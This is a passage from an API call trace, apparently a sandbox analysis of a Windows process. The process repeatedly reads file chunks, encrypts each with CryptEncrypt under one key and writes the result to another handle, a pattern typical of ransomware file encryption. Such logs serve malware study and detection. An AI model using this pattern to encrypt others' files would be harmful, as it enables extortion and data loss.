lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.478] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.479] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.479] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.479] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.479] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.479] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.480] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.480] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.480] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.480] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.480] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.481] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.481] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.481] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.481] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.481] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.482] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.482] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.482] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.482] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.482] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.483] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.483] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.483] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.483] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.483] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.484] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.484] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.484] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.484] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.484] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.485] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.485] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.485] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.485] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 